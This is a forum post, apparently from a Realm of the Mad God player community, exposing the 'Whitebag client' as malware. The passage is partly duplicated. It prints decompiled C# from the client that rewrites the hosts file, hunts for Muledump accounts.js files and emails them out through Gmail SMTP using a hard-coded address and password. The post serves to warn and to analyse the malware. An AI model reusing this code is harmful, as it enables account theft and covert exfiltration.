"Whitebag" Client? O, RLY?
Nilly was being curious. She downloaded the "Whitebag client" from the *
*removed* by moderation.
She found suspicious stuff inside and let me investigate. Thanks again, nilly.
For those who dont know, HERE IS THE URL
IF YOU DOWNLOAD IT , DONT RUN IT.
I know links are not allowed . I am doing this because this because i dont want Whitebag owner to delete the proof without someone other than me had kept the bad files safe somewhere on his computer.
IF YOU DOWNLOAD IT , DONT RUN IT.
*removed* by moderation
https://www.virustotal.com/file/056a...2975/analysis/
As you can see, no virus is detected on Whitebagclient.exe
Now, lets analyse this shit:
* Whitebag.exe is a .NET program (no surprise..) and it obfuscated so tools like Reflector can't display the source code.
Obfuscation is very suspicious but with tools we can remove it. So i have removed it.
*WhiteBagclient.exe blocks other RWT websites on your computer by writing stuff in your host file without your knowledge, which is a thing that only VIRUSES do.
* WhiteBagclient.exe has a build in feature to steal Muledump account.js and send it to wildshadowstudio@gmail.com and mangorotmg@gmail.com using wildshadowstudio@gmail.com credentials
* The credentials of the gmail account are not valid anymore. Since when, i dont know.
* The update program looks into the RotmgWiki.com website. So we can assume that this website is related to WhiteBag and maybe have the same owner.
Even if the login+password isnt working, there is NO VALID REASON to find such a thing in a program instead to fuck people who ran it.
What can do a RWT website with stolen accounts? Isn't that obvious? Sell stolen stuff .
GG Whitebag, really, GG..
*removed* by moderation.
She found suspicious stuff inside and let me investigate. Thanks again, nilly.
For those who dont know, HERE IS THE URL
IF YOU DOWNLOAD IT , DONT RUN IT.
I know links are not allowed . I am doing this because this because i dont want Whitebag owner to delete the proof without someone other than me had kept the bad files safe somewhere on his computer.
IF YOU DOWNLOAD IT , DONT RUN IT.
*removed* by moderation
https://www.virustotal.com/file/056a...2975/analysis/
As you can see, no virus is detected on Whitebagclient.exe
Now, lets analyse this shit:
* Whitebag.exe is a .NET program (no surprise..) and it obfuscated so tools like Reflector can't display the source code.
Obfuscation is very suspicious but with tools we can remove it. So i have removed it.
*WhiteBagclient.exe blocks other RWT websites on your computer by writing stuff in your host file without your knowledge, which is a thing that only VIRUSES do.
Code:
private void eval_c(object sender, DoWorkEventArgs e) { string path = Environment.GetFolderPath(Environment.SpecialFolder.System) + @"\drivers\etc\hosts"; string str3 = File.ReadAllText(path); int index = str3.IndexOf("rotmgproshop"); str3.IndexOf("rotmg"); str3.IndexOf("pots"); if (index < 0) { StreamWriter writer = new StreamWriter(path, true); writer.Write(Environment.NewLine); writer.Write("##Hosts file edit"); writer.Write(Environment.NewLine); writer.Write("127.0.0.1 www****tmg.ca"); writer.Write(Environment.NewLine); writer.Write("127.0.0.1 rotmg.ca"); writer.Write(Environment.NewLine); writer.Write("127.0.0.1 www****tmgproshop.com"); writer.Write(Environment.NewLine); writer.Write("127.0.0.1 rotmgproshop.com"); writer.Write(Environment.NewLine); writer.Write("127.0.0.1 www****tmg.co"); writer.Write(Environment.NewLine); writer.Write("127.0.0.1 rotmg.co"); writer.Write(Environment.NewLine); writer.Write("127.0.0.1 www.splarf.com"); writer.Write(Environment.NewLine); writer.Write("127.0.0.1 splarf.com"); writer.Write(Environment.NewLine); writer.Write("127.0.0.1 www.realmking.com"); writer.Write(Environment.NewLine); writer.Write("127.0.0.1 realmking.com"); writer.Write(Environment.NewLine); writer.Write("127.0.0.1 www.instapots.com"); writer.Write(Environment.NewLine); writer.Write("127.0.0.1 instapots.com"); writer.Write(Environment.NewLine); writer.Write("127.0.0.1 www****tmgexchange.com"); writer.Write(Environment.NewLine); writer.Write("127.0.0.1 rotmgexchange.com"); writer.Write(Environment.NewLine); writer.Write("127.0.0.1 www.oryxshop.ru"); writer.Write(Environment.NewLine); writer.Write("127.0.0.1 oryxshop.ru"); writer.Write(Environment.NewLine); writer.Write("127.0.0.1 www.realmgod.com"); writer.Write(Environment.NewLine); writer.Write("127.0.0.1 realmgod.com"); writer.Write(Environment.NewLine); writer.Write("127.0.0.1 www.defpot.com"); writer.Write(Environment.NewLine); writer.Write("127.0.0.1 defpot.com"); writer.Write(Environment.NewLine); writer.Write("127.0.0.1 www****tmgoutlet.com"); writer.Write(Environment.NewLine); writer.Write("127.0.0.1 rotmgoutlet.com"); writer.Write(Environment.NewLine); writer.Write("127.0.0.1 www****tmgvault.com"); writer.Write(Environment.NewLine); writer.Write("127.0.0.1 rotmgvault.com"); writer.Write(Environment.NewLine); writer.Write("127.0.0.1 www****tmgmall.com"); writer.Write(Environment.NewLine); writer.Write("127.0.0.1 rotmgmall.com"); writer.Write(Environment.NewLine); writer.Write("127.0.0.1 www.buyrotmgitems.com"); writer.Write(Environment.NewLine); writer.Write("127.0.0.1 buyrotmgitems.com"); writer.Write(Environment.NewLine); writer.Dispose(); } }
Code:
.................[CUT]................................... MailMessage message = new MailMessage(); Label_11CD: num3 = 0x16d; message.Subject = "WhiteBag Report v17.2.0 - " + Conversions.ToString(num9); Label_11EB: num3 = 0x16e; message.To.Add("mangorotmg@gmail.com"); Label_1202: num3 = 0x16f; message.From = new MailAddress("wildshadowstudio@gmail.com"); Label_1219: num3 = 0x170; message.Body = "########v17.2.0#######\r\n##########DL##########\r\n" + left + "\r\n" + str17 + str + str23 + str7 + str5 + str12 + str18 + str8 + str26 + "\r\n##########DT##########\r\n" + str24 + "\r\n" + str28 + str21 + str33 + str39 + str13 + str38 + str35 + str9 + str11 + str41 + str32 + str22 + str19 + str36 + str27 + str30 + str10 + str16 + str15 + str4 + str34 + str29 + str37 + str42 + str14 + str25 + "\r\n"; Label_1361: num3 = 0x171; SmtpClient client = new SmtpClient("smtp.gmail.com"); Label_1373: num3 = 370; client.EnableSsl = true; Label_1381: num3 = 0x173; client.Credentials = new NetworkCredential("wildshadowstudio@gmail.com", " vvubronlzifxkatm"); Label_139D: num3 = 0x174; client.Port = Conversions.ToInteger("587"); Label_13B4: num3 = 0x175; client.Send(message);
private void eval_b(object sender, DoWorkEventArgs e) { int num7; try { int num3; Label_0007: ProjectData.ClearProjectError(); int num2 = 1; Label_000E: num3 = 2; string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.Desktop); Label_0018: num3 = 3; Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData); Label_0022: num3 = 4; string str3 = Strings.Left(folderPath, folderPath.Length - 7); Label_0036: num3 = 5; string path = str3 + "Downloads"; Label_0046: num3 = 6; string[] strArray2 = Directory.GetFiles(path, "accounts.js", SearchOption.AllDirectories); int index = 0; while (index < strArray2.Length) { string item = strArray2[index]; Label_0063: num3 = 7; this.ListBox2.Items.Add(item); index++; Label_007E: num3 = 8; } Label_0088: num3 = 9; string[] strArray = Directory.GetFiles(folderPath, "accounts.js", SearchOption.AllDirectories); int num4 = 0; while (num4 < strArray.Length)
* The credentials of the gmail account are not valid anymore. Since when, i dont know.
* The update program looks into the RotmgWiki.com website. So we can assume that this website is related to WhiteBag and maybe have the same owner.
Even if the login+password isnt working, there is NO VALID REASON to find such a thing in a program instead to fuck people who ran it.
What can do a RWT website with stolen accounts? Isn't that obvious? Sell stolen stuff .
GG Whitebag, really, GG..

may be ok in the discussion section rather than in the main section.